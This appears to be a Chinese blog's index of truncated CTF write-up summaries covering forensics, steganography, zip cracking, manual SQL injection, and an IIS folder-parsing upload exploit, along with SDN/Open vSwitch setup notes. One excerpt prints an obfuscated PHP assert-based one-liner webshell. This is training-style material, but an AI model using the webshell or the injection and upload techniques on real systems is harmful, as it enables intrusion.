摘要:
先水几句,这次的题确实难啊,动用洪荒之力了,第一名的神仙也没有全部做完。 官方说这次的题目有两道没被做出来,我猜应该是PWN和RE吧 本来我们是45名的,最后5分钟那帮人啊,硬生生给我们挤出前50,我都想砸电脑了, 后来官方又说前65名成功获得参赛资格,我去!又活了,但是无奈前50只刷掉几个队伍, 阅读全文
摘要:
https://new.bugku.com/upload/findme.zip 下载文件后发现是一个VMware虚拟磁盘文件,作者提示flag在回收站里,于是将文件拖入DG里 复制压缩文件,打开$RPUZN3K.zip后发现里面有一张.png图片,需要压缩密码,拖入winhex发现不是伪加密,显示图 阅读全文
摘要:
还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL 阅读全文
摘要:
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[ 阅读全文
摘要:
SDN 与 Mininet 概述 SDN 全名为(Software Defined Network)即软件定义网络,是现互联网中一种新型的网络创新架构,其核心技术 OpenFlow 通过网络设备控制面与数据面分离开来,从而实现网络流量的灵活控制,为网络及应用提供了良好的平台。而 Mininet 是一 阅读全文
摘要:
题目解压后有三个文件,首先做第一个。 一、解压ctf1.zip发现需要解压密码,这时候使用ARCHPR爆破工具字典爆破,发现是弱口令:password 填写密码解压,有个ctf.txt文件,打开后发现是个编码 有等号基本确定是base编码,在线解密base64 发现还有个uincode编码,解码后获 阅读全文
摘要:
安装 Open vSwitch (Ubuntu Server 16.04) 1、查看主机系统内核版本:uname –a 2、上传openvswitch软件包,解压后执行安装: 更新下载源 $ sudo apt-get update $ sudo apt-get upgrade 下载lrzsz后rz上 阅读全文
摘要:
其实这原先是实验吧的题,干脆一并写了 一、隐写术常规套路,binwalk,winhex,再加一些steg什么的工具,先用winhex打开图片或者binwalk扫描 发现pk头,MP3格式文件,txt文件。如果用binwalk会扫出这两个文件,导出即可 二、更改图片后缀名为.rar,发现两个文件 一段 阅读全文
摘要:
好嗨呦,感觉人生到达了巅峰!!! _^_,听完下载的音频后的我的反应。 咳咳,言归正传,其实就是歌曲we will rock you+摩斯码的组合,简直无缝连接啊,原作加上摩斯码后尽然如此悦耳,爱音乐的你一定要试一下哦 用Audacity打开后声轨是这样的 好像也看不出什么,摩斯码出现在前几秒,哎, 阅读全文
摘要:
随便发一个允许上传的文件,BP抓包,发现网站是用asp写的2.上传图片马,连接菜刀无法解析 3.先猜测大漏洞IIS下文件解析漏洞,这题主要考察怎么创建文件夹的。 例如:在a.asp文件夹下,里面的所有文件都将被看做asp文件执行,举例:123.jpg在a.asp文件夹下就会被看做123.jpg.as 阅读全文